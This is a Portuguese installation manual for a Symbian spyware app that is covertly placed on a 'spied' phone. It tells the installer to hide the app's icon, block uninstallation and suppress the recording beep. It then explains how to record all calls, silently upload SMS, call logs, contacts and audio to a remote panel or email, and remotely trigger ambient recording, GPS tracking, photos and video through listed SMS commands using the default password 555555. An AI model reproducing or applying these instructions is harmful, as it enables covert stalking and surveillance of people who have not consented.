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                                      MANUAL DE INSTALAÇÃO E CONFIGURAÇÃO 

 

Como instalar / desinstalar  

O aplicativo deve ser instalado o mesmo que todos os aplicativos nativos Symbian.  

Instalação - Transfira a aplicação para o seu dispositivo via Bluetooth, Cabo USB, ou Download OTA 

(SMS), e você será automaticamente solicitado a instalar o aplicativo.  

* NOTA: Instale na memória interno do celular  para um melhor desempenho e estabilidade. Salvar 

clipes para o seu cartão de memória.  

   

Desinstalação - Para desinstalar o aplicativo,vá para a App. Manager (Normalmente Menu -> 

Configurações - Dados Dom -> App Mons), selecione TRa  da lista, e escolha Opções -> Remover. Isso irá 

desinstalar o aplicativo totalmente. Se você tiver habilitado a opção "Protegido", você não será capaz de 

desinstalar o aplicativo até que você desabilitar essa configuração.  

        

----> NOTAS IMPORTANTES - LEIA! <-----  

       Para inserir o nº do registro vá à esquerda "Opções" e escolha a opção "Register". Insira  os nº  de 

registro, em seguida, pressione o botão "Opções" novamente a tecla e escolha a opção "Register" para 

completar a instalação.   

Após ter  inserido o nº do registro desligue e ligue novamente o aparelho  envie  de um SMS em branco 

para a senha (por padrão é 555555), para abrir o programa e dar inícios as configurações.  

                                                

ATENÇÃO: Para receber os email com as gravação é necessário que o celular espionado tenha internet 

ativa, por:  

- Chip 3G (qualquer operadora / o envio de dados é gratuíto), ou  

- WAP (gasta créditos para o envio de dados) ou  

- Wi-Fi (rede interna / gratuíto)  

Entre em "Menu > Web > Opções > Configurações > Ponto de Acesso > Definido pelo usuário" - e 

escolha a conexão web correta (ex. Tim Connect Fast / Vivo Internet /  

 

Usando o aplicativo  
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LOG( REGISTROS)  

-> Opções (tecla Esquerda)  

+ Play - Reproduz o clipe de áudio  

+ Delete - Exclui o clipe selecionado  

+ Marcar / Desmarcar  

* Mark - Mark o clipe para executar uma ação  

* Mark All - Marcar todos os clipes, para executar uma ação em todos (ou seja, enviar, deletar, etc)  

+ Copiar para Galeria - Copia o clip (s) para o padrão Galeria de imagens do dispositivo para facilitar o 

acesso fora de Total Recall  

+ Detalhes - Exibe os detalhes do clipe (tamanho, duração, formato, etc)  

+ Rename - Permite renomear manualmente o clipe  

  + Nota Editar - Editar um texto da nota atribuída ao clipe (válido apenas no dispositivo)  

+ Enviar  

* Via Bluetooth  

* Via IR  

* Via MMS  

* HTTP  

-> Voltar (tecla direita)  

 

SETTINGS(CONFIGURAÇÕES)  

 

Auto Recording (Gravação de Auto)  

ALL (configuração padrão) - grava todas as chamadas efetuadas e recebidas 

Incomming - Grava todas as chamadas recebidas automaticamente 

Outgoing - Grava todas as chamadas efetuas das automaticamente 

List only - Grava chamadas apenas de números definido na lista (Conjunto esses números na lista de 

Ambiente)  

Exclude List -  ( Excluir Lista) Excluir Lista  chamadas somente os registros que não são definidos na sua 

lista (Conjunto esses números na lista de Ambiente) 
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Off -  Gravação de chamadas  é condicionada  desativada 

**DEIXE EM ALL 

 

Spy Call Recording( Espião de gravação de chamada)  - Indica se você deseja que o o software grave as 

ligação de chamadas  YES ou  NO se deseja  

                           DEIXE EM  YES 

 

Call Recording Format(Forma de Gravação de Chamada) 

DEIXE em AMR 

 

Beep  Suppression( Ativar ou Desativar o Beep)- Normalmente você não precisará ajustar isso, no 

entanto, se você quiser ativar o bipe, ajuste esta opção para "desativar"  

Se as gravações a cada 20 segundo tiver acionando o beep deixe em enable 

ENABLE - significa ativar                   - Desativar - Beep será ouvido  

DISABLE - significa desativar           - Desativar - Beep será ouvido  

DEIXAR EM ENABLE 

Caso continue ouvindo o beep faça o seguinte no menu do celular:  

Ferramentas > Perfis > Normal > Personalizar > Sinal de Aviso > Desativar. 

 

Save In(Guarda em )- Isso permite que você escolha onde quer que os clips de áudiosejam salvos. As 

opções são: Telefone (clipes serão privada para a aplicação),  

* Phone Memory - Memória Interna do celular 

* Phone Gallery - Galeria de memória do celular 

*E: Memory – Cartão de Memória externo de forma oculta 

*E: Memory Gallery -Galeria de Memória do Cartão 

DEIXAR EM E: Memory 

 

Password( Senha) - Altera a senha de acesso ao aplicativo. Esta senha deve ser numérica e SEIS (6) 

caracteres. O padrão é 555555  

Se for usar o sistema para ocultar o programa Cadastre uma nova senha 
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** Depois de  oculto, pedido só pode ser acessada através do envio de um SMS em branco para a senha 

(por padrão é 555555)  

  

Auto Start (Auto iniciar automático)- Ativar ou desativar o início automático na reinicialização do 

dispositivo. Defina como Ativada por padrão 

YES ou NO 

DEIXE EM  YES 

 

 Debug Log( Depurar Registro) - Se for definido como Sim, o aplicativo irá criar um log de execução para 

nos ajudar a rastrear qualquer problema que possa ter. E também fica registrado todas as ligações 

efetuadas e recebidas 

YES ou NO  

DEIXE EM  YES 

 

 

ADVANCED SETTINGS (CONFIGURAÇÕES  AVANÇADAS) 

 

* Estas configurações tem dois MENUS MAIN e DATA e só estarão disponíveis depois que um código de 

registro válido foi digitado  

MENU - MAIN(Principal)  

 

Access Point (Ponto de Acesso)  

         + Detecção automática - Aplicação irá escolher automaticamente no primeiro dia útil APN  

         + Alternativamente, você pode escolher manualmente a APN para usar na lista dada  

Auto Send (Envio automático)  

         Para + Email + Web - Carregamentos de dados para a sua conta de web remoto e encaminha para 

uma conta de e-mail  

                  + Para Web - Carregamentos de dados para a sua conta de web remoto só  

                  + E-mail - Encaminha dados via nossos servidores para a sua conta de e-mail especificado  

 Send To (Enviar para) – digite seu endereços de e-mail  o qual é encaminhado para os nossos 

servidores via com base nas definições acima  

Protected (Protegido) - Quando ativada evita uma desinstalação do gerenciador de aplicativos  
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YES ou NO  

 Se protegido DEIXE EM  YES 

 

Monitor Number (Número do celular controlador) –Digite o número do celular que vai ser o 

controlador das funções do celular espião o qual enviará dados via SMS.  

Hide Application (Ocultar Aplicação) - Esconde o ícone do aplicativo da pasta de aplicativos instalados e 

no Gerenciador de Tarefas.  

YES ou NO  

Se ocultar DEIXE EM  YES 

OBS:  Para o remover o ícone do programa na pasta de aplicativo vá para o gerenciador de aplicativos 

selecione TRa ICON “opção” Remover logo após desligue e ligue o aparelho, o programa ficará 

totalmente oculto. 

** Depois de  oculto, pedido só pode ser acessada através do envio de um SMS em branco para a senha 

(por padrão é 555555)  

                                              

 

MENU – DATA (DADOS)  

 

Delete After Send (Suprimir Após Enviar) - Automaticamente elimina o clipe de áudio gravado após o 

envio.  Caso você queira excluir as gravações do celular após o envio por email selecione “YES” caso 

contrário “NO”. Lembrando que essas gravações ocupam espaço na memória do celular, embora só 

sejam acessadas através de senha e não aparecem ao usuário, caso queira deletar  as gravações é só 

remover. 

YES ou NO  

DEIXE EM Yes ou NO 

  

 Data to Upload (Dados para Upload (download)) - Marque as caixas dos dados preferenciais que 

devem ser enviados com base em suas configurações de upload ou programados  

+ SMS - irá registrar todos os SMS enviados e recebidos  

+ Call - irá registrar todos os registros de chamadas (entrada e saída)  
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+ Contatos - irá registrar todos os contactos adicionados recentemente  

+ Audio Clips - vai carregar gravações de conversas de áudio  

 

 Data to SMS( Dados de SMS) - Marque as caixas dos dados preferido que deveria ser enviado via 

mensagem SMS para o número do seu  celular controlador definido. *  

Encargos padrão SMS aplicar!  

+ SMS - qualquer entrada / saída sms  

+ Call - qualquer registo de chamadas  

+ Contatos - qualquer contato recentemente adicionado  

 

Data Notification(Dados de Notificação) - Se ativado irá enviar um SMS para o número do celular 

monitorador  sempre que novos dados com sucesso, foi enviado para o painel da web remoto  

YES ou NO  

DEIXE EM  YES SE ATIVAR Data to SMS 

 

Confirm Command(Confirme Comando) - Aplicação vai responder a um número que enviou o comando 

de SMS confirmando que foi recebido.  

YES ou NO  

DEIXE EM  YES 

 

Schedule Type (Agenda de Programação)  

+ Disabled (Desativar) desativa agenda de programação – o qual os  dados são carregados como ocorre 

em tempo real  

+On SMS( Por SMS) - Os dados são guardados até um comando de SMS é recebido  

+Interval( Intervalo) - Os dados são carregados no intervalo predefinido  

+ Time( Tempo) - Os dados são enviados a uma hora diária  

- Interval (in Minutes) (Intervalo (em minutos)) - Intervalo no qual os dados são carregados se o 

Schedule tipo é definido como o "Intervalo"  

-  Time( Tempo) - Momento em que os dados são enviados diariamente se Tipo de agenda é definida 

como "Time"  
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WEB CONTA DE USUÁRIO  

 

Painel de controle  click no link abaixo 

http://www.killermobilesoftware.com/central   

Entrar Padrão:  

Usuário (Username) : fornecido a você (seu IMEI)  

Senha (Password) : 555555 (você pode e deve mudar isto após primeiro login)  

** A conta Web é limitado a 100MB de espaço**  

Em seguida, ajuste as seguintes configurações:  

GPS Leash Latitude 

Longitude Leash GPS  

GPS Leash Radius 

Tipo de alerta 

GPS Intervalo (intervalo em que a aplicação apresentará um relatório para a conta da web com a sua 

localização).  

 

Comandos de SMS  

 

Nosso remoto SMS Comandos adicionar funcionalidade adicional e flexibilidade tanto para a aplicação 

em si e o nosso painel de web remoto. 

 Troque a senha 555555 com aplicação real.  

 

Envie uma mensagem de texto do celular controlador com o código e senha para o celular monitorado. 

                                        



                                              www.softwebcursos.com.br  

                                                                                                     

                                                   

              Exemplo de comando: <senha> KMS PT = KMS555555EN  

OBS: Exemplo de comando com o parâmetro: KMS <senha> GSE <intervalo> (5 minutos de intervalo) =  

KMS555555GSE 5  

Intervalo <intervalo> é o tempo em minuto que ficará acionado o envio das informações das 

coordenadas do GPS “dê um espaço entre a última  letra e o tempo de intervalo 

 EX: KMS555555GSE 5 

NOTA: Qualquer coisa dentro de <> é obrigatório, enquanto a [] é opcional. Por <senha> padrão é 

555555  

KMS<senha> ENBL - Habilitar TRa  

KMS <senha> DSBL - Desabilite TRa 

KMS <senha>SREC -  Iniciar  gravação de som ambiente duração de 34 minutos no máximo   

KMS <senha> STREC - Parar gravação de som ambiente 

KMS <senha> GSWEB  <intervalo> - Iniciar o envio de GPS com intervalo via WEB  

KMS <senha> GSEMAIL <intervalo>  - Iniciar o envio de GPS com intervalo via EMAIL  

KMS <senha> GSSMS <intervalo> - Iniciar o envio de GPS com intervalo via SMS  

KMS <senha> SGTR <tries> <intervalo> - Set GPS tenta no caso de dados NAN  

-  EX: <tries> é a quantidade de tentativas vamos colocar 3 e o  <intervalo> é o tempo em minuto que 

ficará acionado o envio das informações das coordenadas do GPS vamos colocar 5    EX: KMS555555GSE 

3 5  dê o espaço entre a última letra o 3 e o 5 

KMS <senha> GSSTOP - Para o GPS de origem  

 KMS <senha> CIF - Receber Informação do  Celular monitorado  

KMS <senha> SVID <duração em segundo ><intervalo em minutos> - vídeo clipe Recorde e uploads / 

envia por suas configurações. 

 - Defina 0 para o intervalo de gravação de vídeo apenas uma vez. 

-  A 10 segundo de vídeo clipe será cerca de 90 kb. EX: KMS555555SVID 10 0 (grava um clipe de 10 

segundo apenas uma vez)  

KMS <senha> SIP < ENDEREÇO SEM HTTP:> / / >  - Definir  IP 

KMS <senha> MNUM <Monitor Number> - Definir ou trocar o número do celular controlador Ex: 

KMSsenhaMNUM01188234436 

KMS <senha> UDATA - Envie todos os dados armazenados manualmente  
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KMS <senha> SIMNOFL -  Tirar foto sem flash  

KMS <senha> SIMFL – Tirar foto com flash  

KMS <senha> SIMFR - Filmar Imagem da câmera frontal  

KMS <senha> SIMFRFL - Filmar Imagem da câmera frontal com flash  

KMS <senha> UDC – Carregar todos os contatos da agenda  para o Painel do servidor e para seu email  

KMS <senha> TAPN - Testar Access Point( ponto de acesso da internete) e envie o resultado por SMS  

KMS <senha> SETAP <Access Nome Point >– Acessar o nome do  Ponto de Acesso  

KMS <senha> PRO <Value>  - Protegido ... 1 = protegidas, 0 = sem proteção  

KMS <IMEI> SPWD <IMEI> <Nova senha >  -  Definir nova senha 

KMS <senha> RSRT - Reinicie o dispositivo  

KMSDLS - Download configurações para o aplicativo a partir do painel (sem senha necessária)  

KMSULS - Upload de Configurações do aplicativo para o painel (para backup) (sem senha necessária)  

  

 

Sites de Softwares espião - www.softspycell.com.br 

 

 Curso de Detetive www.institutodeinteligencia.com.br  

  

 


